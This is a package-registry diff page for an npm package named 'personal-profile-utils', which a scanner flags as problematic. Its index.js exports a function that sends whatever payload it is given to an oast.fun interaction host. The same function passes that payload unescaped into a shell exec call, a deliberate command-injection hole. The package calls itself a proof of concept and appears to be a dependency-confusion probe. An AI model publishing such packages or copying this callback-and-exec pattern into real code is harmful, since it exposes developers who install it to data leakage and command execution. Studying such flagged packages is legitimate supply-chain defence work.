personal-profile-utils 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of personal-profile-utils might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +26 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1,26 @@
1
+ // index.js
2
+ const { exec } = require('child_process');
3
+ const http = require('http');
4
+
5
+ function vulnerableFunction(payload) {
6
+ // Replace "your.server.com" with the hostname or IP address of your server
7
+ const url = `http://cen13pe2vtc0000dhckgg8kot5eyyyyyb.oast.fun/?payload=${payload}`;
8
+
9
+ // Make an HTTP request to your server
10
+ http.get(url, (res) => {
11
+ console.log(`Server response status: ${res.statusCode}`);
12
+ res.setEncoding('utf8');
13
+ res.on('data', (chunk) => {
14
+ console.log(`Server response body: ${chunk}`);
15
+ });
16
+ });
17
+
18
+ // Execute the vulnerable command
19
+ exec(`echo ${payload}`, (error, stdout, stderr) => {
20
+ console.log(stdout);
21
+ });
22
+ }
23
+
24
+ module.exports = {
25
+ vulnerableFunction
26
+ };
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "personal-profile-utils",
3
+ "version": "1.0.0",
4
+ "description": "this is a PoC",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "ratrarity",
10
+ "license": "MIT"
11
+ }